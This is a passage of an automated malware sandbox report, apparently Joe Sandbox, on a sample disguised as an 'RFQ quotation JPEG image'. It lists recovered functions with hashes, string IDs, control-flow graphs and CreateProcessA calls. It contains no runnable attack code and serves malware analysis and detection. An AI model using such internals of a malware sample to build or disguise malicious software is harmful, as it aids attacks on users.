                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq
                          • API String ID: 0-2687900687
                          • Opcode ID: 7cc3e1aaa5c85e1a49d85f94e2320811edb31710cc9ef9d4670074d865722131
                          • Instruction ID: f1bdf84588e22309d9d7f19b02f199058e6563d6b5c3b4a7d1271755d6fd409e
                          • Opcode Fuzzy Hash: 7cc3e1aaa5c85e1a49d85f94e2320811edb31710cc9ef9d4670074d865722131
                          • Instruction Fuzzy Hash: 95919031E102198FDB15CF69D990AADF7B2BF88300F29C5AAD515AB259D734AD81CF40
                          Function 01410A58 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: \seq
                          • API String ID: 0-3382732615
                          • Opcode ID: 7086f30ca4684940c5a28132b562b6bd272c765820e01c4ac00403f331d77649
                          • Instruction ID: 5e28b16d462356da365046c0012edcc711bb7684d7fc5e4834aa8d2b6094e449
                          • Opcode Fuzzy Hash: 7086f30ca4684940c5a28132b562b6bd272c765820e01c4ac00403f331d77649
                          • Instruction Fuzzy Hash: 0C8108B8E4020ADFDF14DFAAD5849AEBBB1BF48310F10A655D406EB2A4DB359941CF14
                          Function 064FDB90 Relevance: .3, Instructions: 287COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7999864e409d97a584549fb2202eeabc1c106381a1089518c31abc20e3cbc01
                          • Instruction ID: 800e5271845f9d96f6349e3c19cd67535694ea8c7c5bf9d4aa0082ac5eea3611
                          • Opcode Fuzzy Hash: f7999864e409d97a584549fb2202eeabc1c106381a1089518c31abc20e3cbc01
                          • Instruction Fuzzy Hash: D2D1D574E10218DFDB94CFA8D888BADBBB1FF49300F10816AD509AB394DB789985CF54
                          Function 064FD038 Relevance: .3, Instructions: 259COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ffa64647d32ae14d15a96a3a88f754bc8981aeb799cb3fb603059233ccc9330
                          • Instruction ID: 27a583b716d18a2b5d0af5145ebc438ff3eb02ab2af1bfeb32a5dde036735599
                          • Opcode Fuzzy Hash: 2ffa64647d32ae14d15a96a3a88f754bc8981aeb799cb3fb603059233ccc9330
                          • Instruction Fuzzy Hash: 45B1E374E11218CFEB94CF69D948B9DB7B2BF8A304F1090AAD509A7354DB745D86CF40
                          Function 064FD048 Relevance: .3, Instructions: 254COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86e707397f4021024da9437dd195bc24a3c29ab4a78356137baa4d2985809144
                          • Instruction ID: fc00f935a493e9bc6aef615baa18673bdc56f72ad82aa0096d22e13e9d11e3b3
                          • Opcode Fuzzy Hash: 86e707397f4021024da9437dd195bc24a3c29ab4a78356137baa4d2985809144
                          • Instruction Fuzzy Hash: 8AB1F374E11218CFEB94CF69D948BADBBB2BF8A304F1090AAD509A7354DB745D86CF40
                          Function 01412010 Relevance: .2, Instructions: 235COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 120118e597034bb435fe1418bca6f6d0a5ff6e00413ec94f6c5b5eb6700a1734
                          • Instruction ID: 83bf7d0b73a649311c1af9bfe82ed2e69fd032d1001f4153b5758383df9fc240
                          • Opcode Fuzzy Hash: 120118e597034bb435fe1418bca6f6d0a5ff6e00413ec94f6c5b5eb6700a1734
                          • Instruction Fuzzy Hash: C6817E32B106159FC754DB6DD880EAEB7E3AFC8711F2A8165E405DB36ADE74AC018B90
                          Function 063E001E Relevance: .1, Instructions: 137COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d3ba6381dd30b39982d65da281a304d0c1411078065b371594878663edb24746
                          • Instruction ID: b707fbcb6b3c42ba86bef78f7c43c6b55a4043220936f9f23cbfd26eda5030f5
                          • Opcode Fuzzy Hash: d3ba6381dd30b39982d65da281a304d0c1411078065b371594878663edb24746
                          • Instruction Fuzzy Hash: BF51FDB1E016288BDB18CF6BDC4469AFBF7AFC8304F14C1BAD508AA255DB740985CF50
                          Function 0141E610 Relevance: 6.6, Strings: 5, Instructions: 352COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 634 141e610-141e638 636 141e724-141e749 634->636 637 141e63e-141e642 634->637 644 141e750-141e774 636->644 638 141e644-141e650 637->638 639 141e656-141e65a 637->639 638->639 638->644 640 141e660-141e677 639->640 641 141e77b-141e7a0 639->641 652 141e679-141e685 640->652 653 141e68b-141e68f 640->653 663 141e7a7-141e7fa 641->663 644->641 652->653 652->663 656 141e691-141e6aa call 14101e4 653->656 657 141e6bb-141e6d4 653->657 656->657 667 141e6ac-141e6af 656->667 668 141e6d6-141e6fa 657->668 669 141e6fd-141e721 657->669 677 141e832-141e857 663->677 678 141e7fc-141e81c 663->678 672 141e6b8 667->672 672->657 685 141e85e-141e8b2 677->685 678->685 686 141e81e-141e82f 678->686 692 141e959-141e9a7 685->692 693 141e8b8-141e8c4 685->693 705 141e9d7-141e9dd 692->705 706 141e9a9-141e9cd 692->706 696 141e8c6-141e8cd 693->696 697 141e8ce-141e8e2 693->697 700 141e951-141e958 697->700 701 141e8e4-141e909 697->701 712 141e90b-141e925 701->712 713 141e94c-141e94f 701->713 708 141e9ef-141e9fe 705->708 709 141e9df-141e9ec 705->709 706->705 707 141e9cf 706->707 707->705 712->713 715 141e927-141e930 712->715 713->700 713->701 716 141e932-141e935 715->716 717 141e93f-141e94b 715->717 716->717
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$(iq$(iq$(iq$(iq
                          • API String ID: 0-3102978658
                          • Opcode ID: a744eef8f29b13ab8cd2099f6537e255ac8c41fa899d67d89ac6d322b268d194
                          • Instruction ID: 9e6bcc840bf3ea1f42abbb7428d25dc8c9310ba1bd2d704bac5a2e3de2916842
                          • Opcode Fuzzy Hash: a744eef8f29b13ab8cd2099f6537e255ac8c41fa899d67d89ac6d322b268d194
                          • Instruction Fuzzy Hash: 55C121353042658FDB15DF6DD840AAE3BA6EF84310B1884AAE909CB3A5CF35DC46C7A0
                          Function 06500E20 Relevance: 4.1, Strings: 3, Instructions: 365COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1022 6500e20-6500e30 1023 6500e36-6500e3a 1022->1023 1024 6500f49-6500f6e 1022->1024 1025 6500e40-6500e49 1023->1025 1026 6500f75-6500f9a 1023->1026 1024->1026 1029 6500fa1-6500fd7 1025->1029 1030 6500e4a-6500e76 1025->1030 1026->1029 1046 6500fde-6501034 1029->1046 1040 6500e7c-6500e7e 1030->1040 1041 6500f3e-6500f48 1030->1041 1042 6500e80-6500e83 1040->1042 1043 6500e9f-6500ea1 1040->1043 1045 6500e89-6500e93 1042->1045 1042->1046 1047 6500ea4-6500ea8 1043->1047 1045->1046 1048 6500e99-6500e9d 1045->1048 1061 6501036-650104d call 6501538 1046->1061 1062 6501058-650106f 1046->1062 1049 6500f09-6500f15 1047->1049 1050 6500eaa-6500eb9 1047->1050 1048->1043 1048->1047 1049->1046 1053 6500f1b-6500f38 1049->1053 1050->1046 1057 6500ebf-6500f06 1050->1057 1053->1040 1053->1041 1057->1049 1068 6501053 1061->1068 1069 6501160-6501170 1062->1069 1070 6501075-650115b 1062->1070 1072 6501283-650128e 1068->1072 1077 6501176-6501250 1069->1077 1078 650125e-650127a 1069->1078 1070->1069 1079 6501290-65012a0 1072->1079 1080 65012bd-65012de 1072->1080 1115 6501252 1077->1115 1116 650125b 1077->1116 1078->1072 1086 65012b0-65012b6 1079->1086 1087 65012a2-65012a8 1079->1087 1086->1080 1087->1086 1115->1116 1116->1078
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$(iq$Hiq
                          • API String ID: 0-2457769603
                          • Opcode ID: 5937cc0f36cf9907f0b20cdca581b8e512f4af4e6fbc77090dfc488239705d23
                          • Instruction ID: 89ea1e3f7d27ca04bcaf606f89a74267bad95ab7c5ebf116c0f3b410031db1d8
                          • Opcode Fuzzy Hash: 5937cc0f36cf9907f0b20cdca581b8e512f4af4e6fbc77090dfc488239705d23
                          • Instruction Fuzzy Hash: 4CE17434A00619DFCB44EFA4D49499DBBB2FFC9300F108569E915AB3A4DB34EC46CB91
                          Function 056E0D98 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2109782239.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_56e0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: aa15bbb9c1dca4c056ef021481f4b69562959f250c728a0929f6f5a150bb6e86
                          • Instruction ID: b614074b33a0e81573b9a91d85079212ccb62ad01f0286bd3b07c16360663a70
                          • Opcode Fuzzy Hash: aa15bbb9c1dca4c056ef021481f4b69562959f250c728a0929f6f5a150bb6e86
                          • Instruction Fuzzy Hash: AB42D4B4E1621DCFDB19DFA4D448ABEBBB2FB89310F10801AD912AB754CB345982DF51
                          Function 0654F7E0 Relevance: 3.0, Strings: 2, Instructions: 483COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1605 654f7e0-654f7e5 1606 654f7ed-654f7f7 1605->1606 1608 654f81d-654f820 1606->1608 1609 654f7f9-654f817 1606->1609 1610 654f9a5-654f9ac 1608->1610 1611 654f826-654f82c 1608->1611 1609->1608 1614 654f9ee-654fa39 1609->1614 1611->1610 1613 654f832-654f83b 1611->1613 1617 654f873-654f879 1613->1617 1618 654f83d-654f84c 1613->1618 1636 654fa72-654fa74 1614->1636 1637 654fa3b-654fa48 1614->1637 1619 654f984-654f98a 1617->1619 1620 654f87f-654f888 1617->1620 1618->1617 1625 654f84e-654f867 1618->1625 1619->1610 1623 654f98c-654f99c 1619->1623 1620->1619 1627 654f88e-654f89a 1620->1627 1623->1610 1629 654f99e-654f9a3 1623->1629 1625->1617 1633 654f869-654f86c 1625->1633 1634 654f8a0-654f8c8 1627->1634 1635 654f938-654f97c 1627->1635 1629->1610 1633->1617 1634->1635 1649 654f8ca-654f907 1634->1649 1635->1619 1638 654febf-654fec6 1636->1638 1637->1636 1642 654fa4a-654fa70 1637->1642 1642->1636 1656 654fa79-654faad 1642->1656 1649->1635 1661 654f909-654f936 1649->1661 1664 654fb50-654fb5f 1656->1664 1665 654fab3-654fabc 1656->1665 1661->1619 1672 654fb61-654fb77 1664->1672 1673 654fb9e 1664->1673 1666 654fec7-654fed3 1665->1666 1667 654fac2-654fad5 1665->1667 1675 654fad7-654faf0 1667->1675 1676 654fb3e-654fb4a 1667->1676 1683 654fb97-654fb9c 1672->1683 1684 654fb79-654fb95 1672->1684 1674 654fba0-654fba5 1673->1674 1678 654fba7-654fbc8 1674->1678 1679 654fbe8-654fc04 1674->1679 1675->1676 1693 654faf2-654fb00 1675->1693 1676->1664 1676->1665 1678->1679 1696 654fbca 1678->1696 1688 654fccc-654fcd5 1679->1688 1689 654fc0a-654fc13 1679->1689 1683->1674 1684->1674 1694 654febd 1688->1694 1695 654fcdb 1688->1695 1689->1666 1691 654fc19-654fc36 1689->1691 1716 654fc3c-654fc52 1691->1716 1717 654fcba-654fcc6 1691->1717 1693->1676 1707 654fb02-654fb06 1693->1707 1694->1638 1697 654fd46-654fd54 call 654d130 1695->1697 1698 654fce2-654fce4 1695->1698 1699 654fce9-654fcf7 call 654d130 1695->1699 1703 654fbcd-654fbe6 1696->1703 1711 654fd56-654fd5e 1697->1711 1712 654fd6c-654fd83 call 654d130 1697->1712 1698->1638 1708 654fd0f-654fd16 1699->1708 1709 654fcf9-654fd01 1699->1709 1703->1679 1707->1666 1714 654fb0c-654fb25 1707->1714 1708->1638 1709->1708 1711->1712 1725 654fd85-654fd8d 1712->1725 1726 654fd9b-654fdae call 654d130 1712->1726 1714->1676 1729 654fb27-654fb3b call 654bf60 1714->1729 1716->1717 1734 654fc54-654fc62 1716->1734 1717->1688 1717->1689 1725->1726 1736 654fdc6-654fde3 call 654d130 1726->1736 1737 654fdb0-654fdb8 1726->1737 1729->1676 1734->1717 1742 654fc64-654fc68 1734->1742 1748 654fde5-654fded 1736->1748 1749 654fdfb 1736->1749 1737->1736 1742->1666 1744 654fc6e-654fc97 1742->1744 1744->1717 1753 654fc99-654fcb7 call 654bf60 1744->1753 1748->1749 1749->1638 1753->1717
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Pleq$$eq
                          • API String ID: 0-256856317
                          • Opcode ID: 0961b2158dc24ed40e4180ea876a1d5cfe326fca374ea5fbf040540ffd94ea45
                          • Instruction ID: 2cfbe15912dd5a8ed5c447ef5bfcc86af38bb8e636df1c2293a1c2760b027653
                          • Opcode Fuzzy Hash: 0961b2158dc24ed40e4180ea876a1d5cfe326fca374ea5fbf040540ffd94ea45
                          • Instruction Fuzzy Hash: 40122774B002058FDB54EF29C994A6AB7F2FF89319F2584A9E505CB3A1DB31EC41CB51
                          Function 056E18C0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1882 56e18c0-56e18e8 1883 56e18ef-56e1918 1882->1883 1884 56e18ea 1882->1884 1885 56e191a-56e1923 1883->1885 1886 56e1939 1883->1886 1884->1883 1887 56e192a-56e192d 1885->1887 1888 56e1925-56e1928 1885->1888 1889 56e193c-56e1940 1886->1889 1890 56e1937 1887->1890 1888->1890 1891 56e1cf7-56e1d0e 1889->1891 1890->1889 1893 56e1d14-56e1d18 1891->1893 1894 56e1945-56e1949 1891->1894 1895 56e1d4d-56e1d51 1893->1895 1896 56e1d1a-56e1d4a 1893->1896 1897 56e194e-56e1952 1894->1897 1898 56e194b-56e19a8 1894->1898 1902 56e1d72 1895->1902 1903 56e1d53-56e1d5c 1895->1903 1896->1895 1900 56e197b-56e199f 1897->1900 1901 56e1954-56e1978 1897->1901 1906 56e19ad-56e19b1 1898->1906 1907 56e19aa-56e1a1b 1898->1907 1900->1891 1901->1900 1904 56e1d75-56e1d7b 1902->1904 1908 56e1d5e-56e1d61 1903->1908 1909 56e1d63-56e1d66 1903->1909 1912 56e19da-56e1a01 1906->1912 1913 56e19b3-56e19d7 1906->1913 1917 56e1a1d-56e1a7a 1907->1917 1918 56e1a20-56e1a24 1907->1918 1915 56e1d70 1908->1915 1909->1915 1937 56e1a03-56e1a09 1912->1937 1938 56e1a11-56e1a12 1912->1938 1913->1912 1915->1904 1926 56e1a7f-56e1a83 1917->1926 1927 56e1a7c-56e1ad8 1917->1927 1922 56e1a4d-56e1a71 1918->1922 1923 56e1a26-56e1a4a 1918->1923 1922->1891 1923->1922 1933 56e1aac-56e1acf 1926->1933 1934 56e1a85-56e1aa9 1926->1934 1939 56e1add-56e1ae1 1927->1939 1940 56e1ada-56e1b3c 1927->1940 1933->1891 1934->1933 1937->1938 1938->1891 1946 56e1b0a-56e1b0d 1939->1946 1947 56e1ae3-56e1b07 1939->1947 1949 56e1b3e-56e1ba0 1940->1949 1950 56e1b41-56e1b45 1940->1950 1952 56e1b15-56e1b22 1946->1952 1947->1946 1961 56e1ba5-56e1ba9 1949->1961 1962 56e1ba2-56e1c04 1949->1962 1955 56e1b6e-56e1b86 1950->1955 1956 56e1b47-56e1b6b 1950->1956 1959 56e1b24-56e1b2a 1952->1959 1960 56e1b32-56e1b33 1952->1960 1970 56e1b88-56e1b8e 1955->1970 1971 56e1b96-56e1b97 1955->1971 1956->1955 1959->1960 1960->1891 1966 56e1bab-56e1bcf 1961->1966 1967 56e1bd2-56e1bea 1961->1967 1972 56e1c09-56e1c0d 1962->1972 1973 56e1c06-56e1c68 1962->1973 1966->1967 1981 56e1bec-56e1bf2 1967->1981 1982 56e1bfa-56e1bfb 1967->1982 1970->1971 1971->1891 1977 56e1c0f-56e1c33 1972->1977 1978 56e1c36-56e1c4e 1972->1978 1983 56e1c6d-56e1c71 1973->1983 1984 56e1c6a-56e1cc3 1973->1984 1977->1978 1992 56e1c5e-56e1c5f 1978->1992 1993 56e1c50-56e1c56 1978->1993 1981->1982 1982->1891 1988 56e1c9a-56e1cbd 1983->1988 1989 56e1c73-56e1c97 1983->1989 1994 56e1cec-56e1cef 1984->1994 1995 56e1cc5-56e1ce9 1984->1995 1988->1891 1989->1988 1992->1891 1993->1992 1994->1891 1995->1994
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2109782239.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_56e0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: 5924643c860a0ce14e4bd362e826634c70329536a57d474714c81f71795b169f
                          • Instruction ID: d375719a8ebdfcbac46f9e3af0041af34820b8350c14dc035b0eab5b25125ec1
                          • Opcode Fuzzy Hash: 5924643c860a0ce14e4bd362e826634c70329536a57d474714c81f71795b169f
                          • Instruction Fuzzy Hash: 83F1B674D06218DFCB64DFA4E5986ACBBB2FF8A311F20412AE416B7394DB355986CF10
                          Function 0654DA20 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2243 654da20-654da42 2244 654db36-654db5b 2243->2244 2245 654da48-654da4a 2243->2245 2247 654db62-654db86 2244->2247 2246 654da50-654da5c 2245->2246 2245->2247 2251 654da70-654da80 2246->2251 2252 654da5e-654da6a 2246->2252 2259 654db8d-654dbb1 2247->2259 2251->2259 2260 654da86-654da94 2251->2260 2252->2251 2252->2259 2263 654dbb8-654dc3d call 654ae88 2259->2263 2260->2263 2264 654da9a-654da9f 2260->2264 2290 654dc42-654dc50 call 654d130 2263->2290 2298 654daa1 call 654dc30 2264->2298 2299 654daa1 call 654da20 2264->2299 2266 654daa7-654daf0 2281 654daf2-654db0b 2266->2281 2282 654db13-654db33 call 654bf30 2266->2282 2281->2282 2294 654dc52-654dc58 2290->2294 2295 654dc68-654dc6a 2290->2295 2296 654dc5c-654dc5e 2294->2296 2297 654dc5a 2294->2297 2296->2295 2297->2295 2298->2266 2299->2266
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$Hiq
                          • API String ID: 0-2459830773
                          • Opcode ID: a18f528e1749fbcde83c64cf87bddcec4cb6be0c1a1ccbeef30ef131d11eef95
                          • Instruction ID: 05c71f313e3bb7c2ecd688b46f1839b8ce256273a0a803f4c4d8f239777c8b21
                          • Opcode Fuzzy Hash: a18f528e1749fbcde83c64cf87bddcec4cb6be0c1a1ccbeef30ef131d11eef95
                          • Instruction Fuzzy Hash: 0451BB30B002158FDBA9AF78C85462E7BB6BF89310B2045ADD9068B3A0CF35DD06CB91
                          Function 06503178 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$Hiq
                          • API String ID: 0-2459830773
                          • Opcode ID: 7fec0c743a8842bf36b21bd24b52e961a024129b8018db7d11699891199ffe51
                          • Instruction ID: efe0bcf25b8ceca3cc8b01ac7fedfbcb7655e91cd91a25e3bd60be4872db6840
                          • Opcode Fuzzy Hash: 7fec0c743a8842bf36b21bd24b52e961a024129b8018db7d11699891199ffe51
                          • Instruction Fuzzy Hash: 4451E230B042119FD755DB28C91496E7BE6EF89210B1580AAE505CB3E2DB35DC06CBA1
                          Function 0654A562 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$Hiq
                          • API String ID: 0-2459830773
                          • Opcode ID: 5959c9bf3c5d3a16a2034d1981c8ae444fa7199d2d78ec2521476537d45b8bcb
                          • Instruction ID: 757573064fda4d51b4000e03d3f79905d9f1a8057709ff44fbf08c3c9b2ee30f
                          • Opcode Fuzzy Hash: 5959c9bf3c5d3a16a2034d1981c8ae444fa7199d2d78ec2521476537d45b8bcb
                          • Instruction Fuzzy Hash: 904112706007508FD7A1EF39D44039B7BE6FF84314F148A6DE45A8B695DB34E945CBA0
                          Function 01411DD0 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: $vW+`
                          • API String ID: 0-2655680021
                          • Opcode ID: b8534cb55b3297f7b69c8ca66e71b873d7b66bd95024f826937eb2fb0e134582
                          • Instruction ID: 391023809baf8fc263538f5483786148861c532e3b67540fcef759c11fcecd76
                          • Opcode Fuzzy Hash: b8534cb55b3297f7b69c8ca66e71b873d7b66bd95024f826937eb2fb0e134582
                          • Instruction Fuzzy Hash: FD416A71F0011A8FCB10CFA9D8805AFF7B2FB84626B55C52AE614DB719D730E9628BD1
                          Function 0650C818 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$%
                          • API String ID: 0-2141590602
                          • Opcode ID: ce07073c576c9b942a9b051e8875ef46cdbcad6721d45e122b3c836c50e64394
                          • Instruction ID: c4b141d8a4d72ee4abc82627d0d26d3832322e7aeb758a072de04f347bcaa728
                          • Opcode Fuzzy Hash: ce07073c576c9b942a9b051e8875ef46cdbcad6721d45e122b3c836c50e64394
                          • Instruction Fuzzy Hash: F5111B34A00205DFDB44CF68E599AAD77F5FF49304F504669D406AB294DBB49D85CF40
                          Function 06837A60 Relevance: 2.5, Strings: 2, Instructions: 34COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: a$l
                          • API String ID: 0-62436560
                          • Opcode ID: 0d89348e53dd4680107a743d10b4d630d21557579f3e8e6f97413f28c9b3b46d
                          • Instruction ID: 181562495cb6ddccaa4ae18f739dfb9a519e30a0a9e4d08baebd8fda2951219f
                          • Opcode Fuzzy Hash: 0d89348e53dd4680107a743d10b4d630d21557579f3e8e6f97413f28c9b3b46d
                          • Instruction Fuzzy Hash: 8511B074A102298FCBA4EF58D884BADB7B1FB48209F1045E4E419A3340DB399EC8CF51
                          Function 0654EFCF Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (_eq
                          • API String ID: 0-480964360
                          • Opcode ID: 1c091413d4b1082f82491c11ffb4d739b0871ac25ebff1523305a8957b64a982
                          • Instruction ID: baf9b9278d80f3da9b010853b4ded8441f2c6287edec70b4096a70f2adb92d8f
                          • Opcode Fuzzy Hash: 1c091413d4b1082f82491c11ffb4d739b0871ac25ebff1523305a8957b64a982
                          • Instruction Fuzzy Hash: BD229C35B002159FDB44DFA8D894AADB7B2FF88304F1484A9E905EB3A5DB75EC44CB90
                          Function 064F1D94 Relevance: 1.8, APIs: 1, Instructions: 268processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064F2007
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 27913da9b665cc2309d5a7d78ec3217310be3ad0d1868240a9f946cead0185da
                          • Instruction ID: cac9f56b0cca90038169071e231f4b5027fa919dff98e22e3bebb6e22a37b136
                          • Opcode Fuzzy Hash: 27913da9b665cc2309d5a7d78ec3217310be3ad0d1868240a9f946cead0185da
                          • Instruction Fuzzy Hash: 07A11371D10218CFDB60CFA9C885BEEBBF1FB09310F14916AE958A7240DBB48985CF95
                          Function 064F1DA0 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064F2007
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
